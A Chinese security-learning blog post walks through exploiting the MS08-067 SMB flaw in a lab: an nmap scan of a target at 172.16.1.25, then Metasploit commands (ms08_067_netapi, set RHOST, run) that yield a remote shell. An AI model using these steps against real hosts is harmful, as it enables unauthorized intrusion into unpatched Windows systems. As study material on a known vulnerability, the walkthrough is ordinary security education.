网安学习日记-MS08-067远程溢出漏洞学习(CVE-2008-4250)

文章详细介绍了MS08-067漏洞的原理,即通过445端口的SMB服务利用RPC请求导致的缓冲区溢出。在发现靶机开启445端口后,使用KaliLinux中的msfconsole工具,遵循搜索模块、设置目标IP、运行攻击等步骤,成功实现远程代码执行并获取靶机shell,展示了漏洞利用的完整过程。
摘要由CSDN通过智能技术生成

一、漏洞原理简介

MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。

二、漏洞发现

扫描靶机版本开启的服务

nmap -sV 172.16.1.25

发现靶机开启了445端口,ms08-067漏洞利用的是445端口中的SMB服务

三、利用漏洞

1、打开kali中msfconsole漏洞测试平台

1、搜索ms08-067漏洞利用模块

search ms08-067

2、使用漏洞攻击模块

use exploit/windows/smb/ms08_067_netapi

3、查看该模块需要配置的参数

show options

4、设置目标靶机IP

set RHOST 172.16.1.25

5、运行攻击模块

run

利用成功,成功拿到靶机shell

6、查看信息

我们可以通过此漏洞拿到我们想要的信息及远程控制

利用完成,实验结束

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值